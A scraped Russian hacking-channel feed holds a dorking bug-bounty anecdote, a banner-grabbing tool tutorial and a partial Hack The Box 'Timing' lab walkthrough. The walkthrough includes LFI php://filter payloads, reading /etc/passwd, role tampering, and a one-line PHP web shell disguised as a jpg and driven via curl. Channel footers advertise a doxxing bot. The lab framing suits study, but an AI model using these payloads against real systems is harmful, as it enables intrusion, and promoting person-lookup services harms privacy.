  <p id="wlLH">Для поиска уязвимых ресурсов был использован следующий дорк:</p>
  <p id="CAM2">1site:*.target.com inurl:http register signup</p>
  <p id="fw01">Дорк позволяет найти поддомены (в данном случае поддомены Nokia и Кембриджского университета), которые работают на протоколе HTTP и позволяют пользователю зарегистрировать учетную запись в своем веб-приложении.</p>
  <p id="08Uw">После того как наметились потенциальные цели. Я сделал следующее:</p>
  <p id="BLsi">&gt;Во-первых, зарегистрировался по всем найденным адресам.</p>
  <p id="WiNI">После регистрации, не входя созданную учетную запись, запросил сброс пароля нажав на «Забыл пароль».</p>
  <p id="D4mw">Проверил, работает ли ссылка для сброса пароля на HTTPS или на HTTP.</p>
  <p id="BimJ">Ссылка для сброса пароля работала на HTTP, что указывает на уязвимость SSL.</p>
  <p id="7dv3">Письмо об уязвимости SSL было отправлено в Nokia 16 августа утром. В тот же день ночью я получил ответ.</p>
  <p id="rGKJ">Найти мой репорт и ссылку на профиль может <a href="https://www.nokia.com/notices/responsible-disclosure/" target="_blank">здесь</a>, в разделе за август 2022 год.</p>
  <p id="ChXI">Письмо об уязвимости SSL в Кембриджский университет и ответ на него.</p>
  <p id="Q4fQ">Вот, как простая уязвимость и умение использовать Гугл Дорки, может сделать вас успешным багхантером.</p>
  <p id="5GH6"><strong>РЕКОМЕНДУЮ:</strong></p>
  <ul id="98B6">
    <li id="k2ri"><a href="https://spy-soft.net/tools-to-find-vulnerabilities/" target="_blank">Инструменты для поиска уязвимостей сайтов</a></li>
    <li id="hptE"><a href="https://spy-soft.net/hack-dutch-government-site/" target="_blank">Вот как я взломал правительственный сайт Нидерландов</a></li>
  </ul>
  <p id="9HXd"><a href="https://spy-soft.net/ssl-vulnerability-google-dorks/" target="_blank">Источник</a></p>
  <figure id="yqTw">
    <img src="https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png" />
  </figure>
  <p id="5buC"><strong>Наши проекты:</strong></p>
  <p id="onv4">- Кибер новости: <a href="https://t.me/matrixleaks" target="_blank"><strong>the Matrix</strong></a><br />- Хакинг: <a href="https://t.me/+bby6PJAbqpNhOWZh" target="_blank"><strong>/me Hacker</strong></a><br />- Кодинг: <a href="https://t.me/+zBgEm0olmpxlMzA6" target="_blank"><strong>Minor Code</strong></a><br />👁 Пробить человека? Легко через нашего бота: <a href="https://t.me/iprobivator_bot" target="_blank"><strong>Мистер Пробиватор</strong></a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@matrix_supp/Sbor-bannerov-na-Kali-Linux-09-25</guid><link>https://teletype.in/@matrix_supp/Sbor-bannerov-na-Kali-Linux-09-25?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><comments>https://teletype.in/@matrix_supp/Sbor-bannerov-na-Kali-Linux-09-25?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp#comments</comments><dc:creator>matrix_supp</dc:creator><title>Сбор баннеров на Kali Linux</title><pubDate>Sun, 25 Sep 2022 10:41:55 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/70/ff/70ffe57a-c25d-4faa-ae20-6a91d89baa9e.png"></media:content><description><![CDATA[<img src="https://img3.teletype.in/files/2b/ca/2bca6f03-aaf2-4279-aafc-524863c8893f.png"></img>Сбор баннеров или как говорят наши иностранные коллеги Banner Gabbing — это получение информации об открытых портах и ​работающих ​службах хоста. Эта техника используются хакерами и пентестерами для анализа системы. В сегодняшней статье я познакомлю вас с лучшими инструментами для сбора баннеров на Kali Linux.]]></description><content:encoded><![CDATA[
  <figure id="JXdG">
    <img src="https://img3.teletype.in/files/2b/ca/2bca6f03-aaf2-4279-aafc-524863c8893f.png" />
  </figure>
  <p id="auCQ">Сбор баннеров или как говорят наши иностранные коллеги Banner Gabbing — это получение информации об открытых портах и ​работающих ​службах хоста. Эта техника используются хакерами и пентестерами для анализа системы. В сегодняшней статье я познакомлю вас с лучшими инструментами для сбора баннеров на Kali Linux.</p>
  <p id="1e6y">Еще по теме: <a href="https://spy-soft.net/http-server-ssl-kali-linux/" target="_blank">HTTP-сервер с шифрованием TLS на Kali Linux</a></p>
  <p id="t36W"><strong>Сбор баннеров на Kali Linux</strong></p>
  <p id="tlWT">Далее рассмотрим инструменты, которые предустановлены в Kali Linux. Если вы работаете на другом дистрибутиве Linux, вы можете установить их самостоятельно с помощью:</p>
  <p id="NIN7">1apt-get install</p>
  <p id="Ibay">Речь пойдет об инструментах:</p>
  <ul id="lBuX">
    <li id="MQOr"><strong>Whatweb </strong></li>
    <li id="H5Yu"><strong>Curl </strong></li>
    <li id="nqbF"><strong>Wget </strong></li>
    <li id="9Twv"><strong>netcat </strong></li>
    <li id="rdq2"><strong>telnet </strong></li>
    <li id="ViHm"><strong>nikto </strong></li>
    <li id="LtIr"><strong>Nmap</strong></li>
  </ul>
  <p id="9Bu6">Для демонстрации я буду использовать намеренно уязвимый сайт уязвимый сайт testphp.vulnweb от Acunetix, специально разработанный для таких, как мы (этичных хакеров).</p>
  <p id="S08z">Статья написана в образовательных целях, для обучения этичных хакеров. При демонстрации работы были использованы личные устройства автора. Использование подобных инструментов на чужих устройствах без надлежащего письменного разрешения, является незаконным и будет расцениваться, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши действия.</p>
  <h3 id="Whatweb">Whatweb</h3>
  <p id="KT9H">Откройте консоль Kali Linuix и выполните команду, добавив при этом урл сайта или IP-адрес:</p>
  <p id="Ymn2">1whatweb &lt;урл_сайта/ip_адрес&gt;</p>
  <p id="GqBT">Я использовал сайт Vulnweb. Вместо урла можно указать IP-адрес.</p>
  <h3 id="Curl">Curl</h3>
  <p id="OmCh">В терминале Kali выполните следующую команду:</p>
  <p id="yebr">1curl -I &lt;урл_сайта/ip_адрес&gt;</p>
  <p id="WWKX">В curl директива-I извлекает заголовок.</p>
  <h3 id="Wget">Wget</h3>
  <p id="Q7A9">Большинство из вас могут использовать wget для скачивания файлов в терминале. Но wget также может помочь в сборе баннеров.</p>
  <p id="MqTq">Откройте консоль Kali и добавив адрес сайта или IP-адрес, выполните следующую команду:</p>
  <p id="cRR8">1wget -q -S &lt;урл_сайта/ip_адрес&gt;</p>
  <p id="HEIX">Директива-q позволяет скрыть лишнюю информацию, а-S предназначен для получения ответа сервера.</p>
  <p id="OOc5">Результат с параметром-q:</p>
  <p id="bcIr">Результат без параметра-q:</p>
  <h3 id="Netcat">Netcat</h3>
  <p id="Pi85"><strong>Способ 1</strong>: Откройте терминал Kali и выполните команду:</p>
  <p id="RZ3s">1nc &lt;имя_хоста/ip_адрес&gt; 80</p>
  <p id="Z8ea">Введите <strong>HTTP/1.1 200</strong> и нажмите Enter.</p>
  <ul id="7s5H">
    <li id="nLK0"><strong>HTTP/1.1</strong> — версия HTTP.</li>
    <li id="y7UN"><strong>200</strong> — код состояния HTTP.</li>
  </ul>
  <p id="PVeL"><strong>Способ 2:</strong> Выполните команду</p>
  <p id="zA7M">1nc &lt;hostname/ip_адрес&gt;</p>
  <p id="9GRk">Теперь введите <strong>HEAD HTTP/ /1.0</strong> и нажмите Enter.</p>
  <ul id="vnoP">
    <li id="TBWQ"><strong>HEAD</strong> — это глагол HTTP, HTTP/ обозначает корень страницы.</li>
    <li id="y6qj"><strong>/1.0</strong> — версия HTTP.</li>
  </ul>
  <h3 id="Telnet">Telnet</h3>
  <p id="IMdK">В консоли Kali, выполните команду:</p>
  <p id="uthR">1telnet &lt;имя_хоста/ip_адрес&gt;</p>
  <p id="fS2E">Появится ​​подсказка.</p>
  <p id="ne7D">Введите <strong>HEAD HTTP//1.0</strong> и нажмите Enter.</p>
  <h3 id="Nikto">Nikto</h3>
  <p id="7FPU">Введите следующую команду и нажмите Enter:</p>
  <p id="1PVo">1nikto -h</p>
  <p id="l9Z3">Вы увидите баннер в качестве вывода. Нажмите <strong>Ctrl+C</strong>, чтобы остановить.</p>
  <h3 id="Nmap">Nmap</h3>
  <p id="1hD2">Последний инструмент сбора баннеров на Kali Linux это популярный сканер <a href="https://spy-soft.net/nmap-obnaruzhenie-xostov/" target="_blank">Nmap</a>.</p>
  <p id="qis3">Подойдите к терминалу и введите</p>
  <p id="nB31">1nmap -sV -A &lt;имя_хоста/ip_адрес&gt; -p 80</p>
  <p id="LwwQ">Параметр:</p>
  <ul id="uyiV">
    <li id="kJKY">-sV используется для определения версии службы.</li>
    <li id="APzi">-A для агрессивного сканирования.</li>
    <li id="l7Jg">-p для определения порта.</li>
  </ul>
  <p id="mGq9"><strong>Заключение</strong></p>
  <p id="9vaa">Мы рассмотрели популярные способы сбора баннеров на Кали. Конечно, существует множество других инструментов и методов для захвата баннеров, но это самые простые, которые сможете быстро освоить и использовать.</p>
  <p id="b2wT"><strong>РЕКОМЕНДУЕМ:</strong></p>
  <ul id="JJxf">
    <li id="id1E"><a href="https://spy-soft.net/nmap-skrytoe-skanirovanie/" target="_blank">Скрытое сканирование хостов с Nmap</a></li>
    <li id="k9du"><a href="https://spy-soft.net/install-and-use-rustscan-kali-linux/" target="_blank">Использование сканера портов RustScan на Kali Linux</a></li>
  </ul>
  <p id="7hnr"><a href="https://spy-soft.net/banner-grabbing-kali-linux/" target="_blank">Источник</a></p>
  <figure id="9f33">
    <img src="https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png" />
  </figure>
  <p id="Y0OT"><strong>Наши проекты:</strong></p>
  <p id="vx7O">- Кибер новости: <a href="https://t.me/matrixleaks" target="_blank"><strong>the Matrix</strong></a><br />- Хакинг: <a href="https://t.me/+bby6PJAbqpNhOWZh" target="_blank"><strong>/me Hacker</strong></a><br />- Кодинг: <a href="https://t.me/+zBgEm0olmpxlMzA6" target="_blank"><strong>Minor Code</strong></a><br />👁 Пробить человека? Легко через нашего бота: <a href="https://t.me/iprobivator_bot" target="_blank"><strong>Мистер Пробиватор</strong></a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@matrix_supp/Vzlom-veb-servera-na-PHP-Hack-The-Box-Timing-06-09</guid><link>https://teletype.in/@matrix_supp/Vzlom-veb-servera-na-PHP-Hack-The-Box-Timing-06-09?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><comments>https://teletype.in/@matrix_supp/Vzlom-veb-servera-na-PHP-Hack-The-Box-Timing-06-09?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp#comments</comments><dc:creator>matrix_supp</dc:creator><title>Взлом веб-сервера на PHP. Hack The Box Timing</title><pubDate>Thu, 09 Jun 2022 15:44:25 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/79/a0/79a01901-65e5-465e-bbd7-9c32da45d029.png"></media:content><description><![CDATA[<img src="https://img1.teletype.in/files/81/2a/812a716b-471d-42be-9de8-40ecf0cfcbd4.png"></img>В этой статье рассмотрим прохождение уязвимой машины Timing Hack The Box, в рамках которой будем взламывать веб-сервер на PHP. Для получения флага мы будем сканировать порты, экс­плу­атировать уяз­вимос­ти LFI и заг­рузим шел­л.]]></description><content:encoded><![CDATA[
  <figure id="XdVz">
    <img src="https://img1.teletype.in/files/81/2a/812a716b-471d-42be-9de8-40ecf0cfcbd4.png" />
  </figure>
  <p id="mNrR">В этой статье рассмотрим прохождение уязвимой машины Timing Hack The Box, в рамках которой будем <a href="https://spy-soft.net/hack-the-box-bountyhunter/" target="_blank">взламывать веб-сервер на PHP</a>. Для получения флага мы будем сканировать порты, экс­плу­атировать уяз­вимос­ти LFI и заг­рузим шел­л.</p>
  <p id="ciNk">Еще по теме: <a href="https://spy-soft.net/hack-wordpress/" target="_blank">Как взломать сайт WordPress</a></p>
  <p id="01H2">Лучше подключаться к машине HTB с помощью VPN. И желательно не делать это со своего личного компа, на котором хранится чувствительная информация.<strong>Взлом веб-сервера на PHP</strong></p>
  <p id="R6Ah">Для начала до­бав­им IP-адрес машины в/etc/hosts:</p>
  <p id="02fp">110.10.11.135 timing.htb</p>
  <p id="qcjI">Начнем со сканирования портов. Это стан­дар­тная операция при любом пентесте. Сканирование портов позволит определить, какие служ­бы на машине при­нима­ют соеди­нение.</p>
  <p id="0DAG">Для этого отлично подходит популярный сканер Nmap. Следующий скрипт улучшит резуль­таты сканирования:</p>
  <p id="Rvb5">123#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d &#x27;/&#x27; -f 1 | tr &#x27;\n&#x27; &#x27;,&#x27; | sed s/,$//)nmap -p$ports -A $1</p>
  <p id="pLAS">Он дей­ству­ет в два эта­па. Пер­вый про­изво­дит­ просто быс­трое ска­ниро­вание, вто­рой — глубокое ска­ниро­вание, используя име­ющиеся скрип­ты (опция —A)</p>
  <figure id="dPG5">
    <img src="https://img4.teletype.in/files/ba/23/ba23d13a-1733-4a3a-ad4f-1bf45d7efe8a.png" />
    <figcaption>Результат сканирования</figcaption>
  </figure>
  <p id="BJwS">Сканер нашел два откры­тых пор­та:</p>
  <ul id="omMt">
    <li id="WtBy">80 — веб‑сер­вер Apache 2.4.29;</li>
    <li id="dygy">22 — служ­ба OpenSSH 7.6p1.</li>
  </ul>
  <p id="PzkG">На SSH нам ловить нечего, про­пус­каем его.</p>
  <p id="OKqv"><strong>Брутфорс учеток</strong></p>
  <p id="d0zL">У нас пока нет учет­ных дан­ных, поэтому нет смыс­ла в анализе служ­б, которые как правило тре­буют авто­риза­ции (нап­ример, SSH). Единс­твен­ное, что можно сделать на данном этапе — перебрать пароли брут­ом, но уязвимые машины с Hack The Boxt практически всегда имеют другие решения. В реальности таких вари­антов может не быть, но можно всегда использовать <a href="https://spy-soft.net/social-engineering-examples/" target="_blank">социальную инженерию</a>.</p>
  <p id="kM7S">При попытке обра­щения к веб‑сер­веру про­исхо­дит редирект на стра­ницу/login.php и форму авто­риза­ции.</p>
  <figure id="VzwK">
    <img src="https://img2.teletype.in/files/5d/32/5d322640-79ab-4f01-be39-f408acf55857.png" />
    <figcaption>Фор­ма авто­риза­ции login.php</figcaption>
  </figure>
  <p id="jLCa">Исходя из этого можно предположить, что это не однос­тра­нич­ный сайт, поэто­му будем пробовать отыскать скры­тые стра­ницы. Пер­вая стра­ница была в PHP, логично осталь­ные переби­рать тоже с расширением PHP. Я предпочитаю использовать для этой цели ска­нер <strong>ffuf</strong>.</p>
  <p id="xDqP"><strong>Сканирование веба c ffuf</strong></p>
  <p id="Zwgp">Пер­вое дей­ствие при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов. Для это­й цели вы можете исполь­зовать прог­раммы вро­де DIRB и <a href="https://github.com/maurosoria/dirsearch" target="_blank">dirsearch</a>.</p>
  <p id="flNP">Мне нравится лег­кий и очень быс­трый <a href="https://github.com/ffuf/ffuf" target="_blank">ffuf</a>. Параметры запуска:</p>
  <ul id="kCMv">
    <li id="JS2d">-w — сло­варь (лично я предпочитаю сло­вари из <a href="https://github.com/danielmiessler/SecLists" target="_blank">SecLists</a>);</li>
    <li id="vdu5">-fc — исклю­чить из резуль­тата отве­ты с кодом 403;</li>
    <li id="bVPE">-u — URL;</li>
    <li id="LNv9">-t — количес­тво потоков.</li>
  </ul>
  <p id="sZMX">За­пус­каем <strong>ffuf</strong> с парамет­рами:</p>
  <p id="uqz7">1ffuf -u http://timing.htb/FUZZ -t 256 -w php_files_common.txt</p>
  <figure id="JQbI">
    <img src="https://img2.teletype.in/files/50/fb/50fb9bb0-f902-41f6-a1fb-995683250a9e.png" />
    <figcaption>Ре­зуль­тат ска­ниро­вания PHP-фай­лов</figcaption>
  </figure>
  <p id="QpL0">Сканер нашел мно­жество фай­лов, теперь попробуем найти скры­тые катало­ги.</p>
  <p id="Zdoi">1ffuf -u http://timing.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt</p>
  <figure id="Cv97">
    <img src="https://img1.teletype.in/files/47/74/4774a3c6-2ddd-4fa7-9b9a-e1dd7c355c1d.png" />
    <figcaption>Ска­ниро­вание скры­тых катало­гов</figcaption>
  </figure>
  <p id="XPwm">Сканер находит катало­ги использующиеся для хра­нения скрип­тов и изоб­ражений. И это все. Ска­ниро­вание поддоменов и фай­лов резервных копий нечего не дало.</p>
  <p id="YAOT">Попробуем поискать парамет­ры. Для ска­ниро­вания разумеется выбираем стра­ницу <strong>image.php</strong>, которая по идее дол­жна воз­вра­щать изоб­ражения. Так как мы пока не зна­ем, что именно будет переда­но в качес­тве зна­чения парамет­ра, попытается передать само наз­вание стра­ницы, надеясь получить какую-то ошиб­ку.</p>
  <p id="kq64">1ffuf -u &#x27;http://timing.htb/image.php?FUZZ=../image.php&#x27; -t 256 -w parameters.txt -fs 0</p>
  <figure id="2fHM">
    <img src="https://img3.teletype.in/files/22/ae/22ae2247-e77c-4777-a85f-7784c650b51e.png" />
    <figcaption>Ска­ниро­вание парамет­ра</figcaption>
  </figure>
  <p id="8Stv">Мы наш­ли один параметр —img. И теперь можно зап­росить файл с кар­тинкой по его наз­ванию. Попытаемся таким образом снять какой‑нибудь сис­темный файл, задав отно­ситель­ный путь.</p>
  <figure id="ANJV">
    <img src="https://img2.teletype.in/files/db/85/db85ff12-e4b9-4e2a-b919-c7fe8f7be041.png" />
    <figcaption>Атака обнаружена</figcaption>
  </figure>
  <p id="vMoB">Попытка не удалась. Нас атаку обнаружили!</p>
  <p id="sU4t">Видимо в данном конкретном случае исполь­зуют­ся какие‑то филь­тры, которые не позволяют нам читать файлы. Я поп­робовал раз­ные вари­анты обер­ток для парамет­ра и понял, что сра­баты­вает вот такой зап­рос:</p>
  <p id="xqi1">12/image.php?img=php://filter/convert.base64-encode/resource=index.phpСправка: LFI в PHP</p>
  <p id="ldd1">Local file inclusion (LFI) — тех­ника, которую исполь­зуют­ для получе­ния дос­тупа к фай­лам в сис­теме через веб‑сер­вер. Что­бы веб-сер­вер отоб­разил файл, вместо попытки выполнения, ему следует передать «обер­тку» — это коман­ды, которые закоди­руют файл. Пос­ле его получе­ния нужно лишь рас­кодиро­вать его обратно. Есть мно­жес­тво различных <a href="https://github.com/payloadbox/rfi-lfi-payload-list" target="_blank">го­товых обер­ток</a>, которые вы можете использовать в пен­тесте.</p>
  <p id="A50e">Со­дер­жимое получен­ной в ответ стра­ницы, будет закоди­рова­но в Base64. Мож­но декоди­ровать пря­мо в Burp, нажав сочетание клавиш <strong>Ctrl-Shift-B</strong>.</p>
  <figure id="d5VA">
    <img src="https://img3.teletype.in/files/25/58/25588a1b-b8d3-4aa3-92a1-22f9a629269a.png" />
    <figcaption>Код стра­ницы index.php</figcaption>
  </figure>
  <p id="dlpu">Таким образом мы можем получить код всех страниц, просмотрим все страницы и среди них оисходный код стра­ницы login.php.</p>
  <figure id="LfLM">
    <img src="https://img3.teletype.in/files/66/1d/661db63b-9f08-4240-af8f-41471a69140d.png" />
    <figcaption>Ис­ходный код login.php</figcaption>
  </figure>
  <p id="yPKz">Наше внимание привлекает строка 10 — под­клю­чения фай­ла <strong>db_conn.php</strong>. Там нашлась учет­ная запись для под­клю­чения к БД. Отроем и его.</p>
  <figure id="FCNM">
    <img src="https://img4.teletype.in/files/73/a3/73a3a4b4-c28e-4984-b9ae-84f4e993ef1b.png" />
    <figcaption>Ис­ходный код db_conn.php</figcaption>
  </figure>
  <p id="SA6K">Па­роль ни к чему не подходит, поэто­му продолжаем копать.</p>
  <p id="Yo8H">Переходим к известным фай­лам. Нач­инаем с <strong>upload.php</strong>.</p>
  <figure id="rNpT">
    <img src="https://img3.teletype.in/files/6f/52/6f5252ed-5347-4fa2-abca-7b88bf459e79.png" />
    <figcaption>Ис­ходный код upload.php</figcaption>
  </figure>
  <p id="TnoV">В начале под­клю­чает­ся файл admin_auth_check.php. После зада­ются нужные парамет­ры для заг­ружен­ного фай­ла, в том чис­ле иfile_name. Создание имени файла происходит по такому алго­рит­му: берет­ся стро­ка&#x27;$file_hash&#x27;, после добав­ляет­ся текущее вре­мя (резуль­тат выпол­нения фун­кцииtime()) и все это кон­верти­рует­ся в хеш MD5, а затем добав­ляет­ся знак ниж­него под­черки­вания и имя фай­ла исполь­зуемое при заг­рузке. Файл дол­жен иметь рас­ширение <strong>jpg</strong>. А в фай­ле <strong>admin_auth_check.php</strong> толь­ко срав­нива­ется роль поль­зовате­ля.</p>
  <p id="x6zH">Ес­ли бы$file_hash кто‑то по ошиб­ке не обер­нул в кавыч­ки, то было бы подставлено зна­чение перемен­ной, получен­ное от PHP-фун­кцииuniqid(). Раз­гадать уни­каль­ный иден­тифика­тор у нас бы не получилось, а без него единс­твен­ной прег­радой будет вывод фун­кцииtime().</p>
  <figure id="VgYy">
    <img src="https://img4.teletype.in/files/fe/66/fe660d6a-a824-4d9c-8094-d25941bd42b9.png" />
    <figcaption>Ис­ходный код admin_auth_check.php</figcaption>
  </figure>
  <p id="w2SF">Итак, здесь пока боль­ше ничего не де­лать, и требуется бру­т фор­мы авто­риза­ции. В начале най­дем име­на поль­зовате­лей, к при­меру в фай­ле <strong>/etc/passwd</strong>.</p>
  <figure id="43ux">
    <img src="https://img1.teletype.in/files/86/ca/86ca9272-439c-4c99-a456-1e8e625ea6f2.png" />
    <figcaption>Со­дер­жимое фай­ла /etc/passwd</figcaption>
  </figure>
  <p id="l7Tg">Но при под­боре пароля сра­зу поп­робу­ем исполь­зовать имя поль­зовате­ля в качес­тве пароля, и это дает нам дос­туп.</p>
  <figure id="Kwta">
    <img src="https://img2.teletype.in/files/9a/20/9a20d6bd-a2b8-4e81-9da6-57ecf0768593.png" />
    <figcaption>Па­нель авто­ризо­ван­ного поль­зовате­ля</figcaption>
  </figure>
  <p id="E34i">Нам откры­вает­ся новая фун­кция — изме­нение про­филя.</p>
  <figure id="oYDj">
    <img src="https://img4.teletype.in/files/31/cb/31cbbaec-501d-4af7-b8a5-f919b5c1ddca.png" />
    <figcaption>Фор­ма изме­нения про­филя</figcaption>
  </figure>
  <p id="iCFL">Форма изменения профиляФор­ма изме­нения про­филя</p>
  <p id="7quS">При отправ­ке дан­ных фор­мы прос­мотрим, куда они шлют­ся, а потом получим код этой стра­ницы, что­бы прос­мотреть, как обра­баты­вают­ся дан­ные.</p>
  <figure id="sTXZ">
    <img src="https://img1.teletype.in/files/4a/54/4a544a42-68f3-48d9-93fc-c98ae16ab656.png" />
    <figcaption>Ис­тория зап­росов в Burp</figcaption>
  </figure>
  <figure id="uyoE">
    <img src="https://img4.teletype.in/files/bd/da/bddab184-af9e-42af-98d1-31ffce5dd85d.png" />
    <figcaption>Ис­ходный код update.php</figcaption>
  </figure>
  <p id="1YPl">Ви­дим, что в обра­бот­чике на один параметр боль­ше, чем отправ­ляет­ся через фор­му. Зна­чит, мы можем добавитьrole и задать любую роль. Это дол­жно дать нам при­виле­гиро­ван­ный кон­текст.</p>
  <figure id="1Ejq">
    <img src="https://img3.teletype.in/files/60/cd/60cdc513-1359-48c4-b6e2-86b41ef9c678.png" />
    <figcaption>Но­вый зап­рос</figcaption>
  </figure>
  <figure id="BOZg">
    <img src="https://img4.teletype.in/files/34/c9/34c9404e-4552-4628-8a76-43fdcccb87ef.png" />
    <figcaption>От­вет сер­вера</figcaption>
  </figure>
  <p id="Mi88">В ито­ге мы получа­ем ответ со все­ми перечис­ленны­ми парамет­рами, а на самой стра­нице появ­ляет­ся ссыл­ка на панель адми­нис­тра­тора.</p>
  <figure id="DHyV">
    <img src="https://img4.teletype.in/files/b3/a6/b3a69ae0-31c0-46f5-b308-d31293b89a90.png" />
    <figcaption>Глав­ная стра­ница адми­нис­тра­тора</figcaption>
  </figure>
  <p id="4Dpn">С панели адми­нис­тра­тора нам откры­вает­ся фун­кция заг­рузки ава­тара.</p>
  <figure id="dJZ8">
    <img src="https://img4.teletype.in/files/37/24/3724c800-773d-4eb9-b587-177d3506b752.png" />
    <figcaption>Фор­ма заг­рузки фай­ла</figcaption>
  </figure>
  <p id="Qol9">Мы зна­ем, что это дол­жен быть файл с рас­ширени­ем jpg. Но вот толь­ко его содер­жимое не про­веря­ется, поэто­му мы можем записать туда код на PHP и затем поп­робовать выпол­нить. Запишем сле­дующий прос­той PHP-шелл, выпол­няющий при­нятую коман­ду, и заг­рузим файл на сер­вер.</p>
  <p id="RtCo">1echo &#x27;&lt;!--?php echo system($_GET[&quot;cmd&quot;]);?--&gt;&#x27; &gt; test.jpg</p>
  <figure id="T54e">
    <img src="https://img3.teletype.in/files/a7/47/a747b094-eaa4-43c8-b763-edc967b2e8e8.png" />
    <figcaption>Со­обще­ние о заг­рузке фай­ла</figcaption>
  </figure>
  <p id="ljrP">Файл успешно заг­ружен, теперь опре­делим­ся с име­нем, под которым он сох­ранил­ся на сер­вере. Для это­го вспом­ним прин­цип, по которо­му он фор­миру­ется.</p>
  <figure id="nt9y">
    <img src="https://img4.teletype.in/files/f4/f1/f4f1cc2f-a355-4543-8453-fb1814b02fe2.png" />
    <figcaption>Код фор­мирова­ния име­ни заг­ружен­ного фай­ла</figcaption>
  </figure>
  <p id="14t9">Единс­твен­ная перемен­ная, которую нам оста­лось получить, — зна­чение фун­кции time(). Эта фун­кция воз­вра­щает количес­тво секунд, про­шед­ших с 00:00:00 01.01.1970. И если мы зна­ем вре­мя заг­рузки фай­ла, уста­нов­ленное на сер­вере, мы смо­жем получить это зна­чение. Так как вся работа выпол­няет­ся через Burp, в исто­рии зап­росов най­дем HTTP-заголо­вок отве­та сер­вера. В заголов­ке Date будет ука­зано нуж­ное нам вре­мя.</p>
  <figure id="VTsy">
    <img src="https://img3.teletype.in/files/20/0d/200d51be-4849-4703-8691-4ca4e2851d43.png" />
    <figcaption>HTTP-заголо­вок отве­та сер­вера при заг­рузке фай­ла</figcaption>
  </figure>
  <p id="LoQt">Те­перь мы можем получить зна­чение MD5 от сло­жения всех строк:</p>
  <p id="wXNQ">1echo md5(&#x27;$file_hash&#x27; . strtotime(&quot;Wed, 05 Jan 2022 13:19:51 GMT&quot;));</p>
  <figure id="AQYR">
    <img src="https://img2.teletype.in/files/5e/1c/5e1c29c8-cd0f-4978-b0df-0067aea7f5e1.png" />
    <figcaption>Рас­чет пер­вой час­ти име­ни фай­ла</figcaption>
  </figure>
  <p id="zPxA">Нам нуж­но обра­щать­ся к фай­лу вот с таким име­нем:</p>
  <p id="eo29">1e3879d6c6425db4ad6e139681d11693d_test.jpg</p>
  <p id="Pwgb">Поп­робу­ем с помощью нашего хеша выпол­нить базовую коман­ду id.</p>
  <p id="cIlg">1curl &#x27;http://timing.htb/image.php?img=images/uploads/e3879d6c6425db4ad6e139681d11693d_test.jpg&amp;cmd=id&#x27;</p>
  <figure id="T2A4">
    <img src="https://img4.teletype.in/files/bb/59/bb59b34c-98b9-4f10-9d25-f4925fd2be88.png" />
    <figcaption>Вы­пол­нение коман­ды id</figcaption>
  </figure>
  <p id="DXku">Ко­ман­да успешно выпол­нена, что озна­чает получе­ние дос­тупа к хос­ту.</p>
  <p id="U16M">Продвижение</p>
  <p id="Dzlc">Для даль­нейше­го прод­вижения нам необ­ходимо най­ти учет­ные дан­ные. Для это­го пред­сто­ит изу­чить фай­лы в катало­ге веб‑сер­вера, все­воз­можные резер­вные копии и дру­гие поль­зователь­ские фай­лы. Так находим бэкапы исходни­ков в катало­ге /opt.</p>
  <figure id="61xl">
    <img src="https://img4.teletype.in/files/f7/7d/f77d8792-0f6c-41cf-8114-1acd7bbbae26.png" />
    <figcaption>Со­дер­жимое катало­га /opt</figcaption>
  </figure>
  <p id="XiRz">Ко­пиру­ем архив в каталог веб‑сер­вера и лег­ко ска­чива­ем через бра­узер.</p>
  <p id="oEtQ">1curl &#x27;http://timing.htb/image.php?img=images/uploads/e3879d6c6425db4ad6e139681d11693d_test.jpg&amp;cmd=cp+/opt/source-files-backup.zip+./&#x27;</p>
  <figure id="g51d">
    <img src="https://img2.teletype.in/files/97/4b/974bbdf0-9347-4ec9-b92c-e6c065985dd0.png" />
    <figcaption>Ска­чива­ние исходных кодов через бра­узер</figcaption>
  </figure>
  <p id="Q3Cq">В архи­ве при­сутс­тву­ет каталог с рас­ширени­ем git. Это поз­волит нам получить дос­туп к исто­рии изме­нений фай­лов.</p>
  <figure id="BxBX">
    <img src="https://img2.teletype.in/files/1e/37/1e374fa3-1c36-440d-bffc-07d9f7eb2dc2.png" />
    <figcaption>Со­дер­жимое архи­ва</figcaption>
  </figure>
  <p id="NNHD">Для удоб­ной работы с репози­тори­ями Git мож­но исполь­зовать гра­фичес­кий прос­мот­рщик gitk. Он помог най­ти изме­нение пароля для под­клю­чения к базе дан­ных.</p>
  <figure id="UMi7">
    <img src="https://img2.teletype.in/files/9a/58/9a58e083-35ab-42a7-ab97-4ffc62d57b64.png" />
    <figcaption>Из­менение в фай­ле db_conn.php</figcaption>
  </figure>
  <p id="zKmT">А вот уже с этим паролем уда­ется под­клю­чить­ся по SSH и заб­рать пер­вый флаг.</p>
  <figure id="09vG">
    <img src="https://img4.teletype.in/files/b6/6a/b66ae12e-410b-421a-a660-4fed52888c0e.png" />
    <figcaption>Флаг поль­зовате­ля</figcaption>
  </figure>
  <p id="hTL6">Локальное повышение привилегий</p>
  <p id="u9rF">Пер­вым делом про­веря­ем наибо­лее веро­ятные мес­та повыше­ния при­виле­гий: нас­трой­ки sudoers, при­ложе­ния с выс­тавлен­ным битом SUID, прос­лушива­емые на локал­хосте пор­ты. Про­верим sudoers коман­дой sudo -l.</p>
  <figure id="qNWf">
    <img src="https://img2.teletype.in/files/9f/5a/9f5a7bb8-baf3-47e5-aee0-5066cabbdfe5.png" />
    <figcaption>Нас­трой­ки судо­ера</figcaption>
  </figure>
